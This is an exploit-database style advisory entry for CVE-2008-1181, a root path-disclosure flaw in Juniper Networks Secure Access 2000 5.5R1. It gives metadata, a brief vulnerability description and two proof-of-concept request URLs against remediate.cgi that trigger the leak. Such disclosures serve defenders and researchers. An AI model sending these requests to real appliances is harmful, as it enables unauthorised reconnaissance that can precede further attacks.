[] NeoSense

Juniper Networks Secure Access 2000 Web - Root Full Path Disclosure

Author: Richard Brain
type: webapps
platform: cgi
port: 
date_added: 2008-02-28 
date_updated: 2014-01-31 
verified: 1 
codes: CVE-2008-1181;OSVDB-42540 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/28037/info

Juniper Networks Secure Access 2000 is prone to a path-disclosure vulnerability.

Exploiting this issue can allow an attacker to access sensitive data that may be used to launch further attacks.

Secure Access 2000 5.5R1 Build 11711 is vulnerable; other versions may also be affected.

https://www.example.com/dana-na/auth/remediate.cgi?action=&step=preauth
https://www.example.com/dana-na/auth/remediate.cgi?step=preauth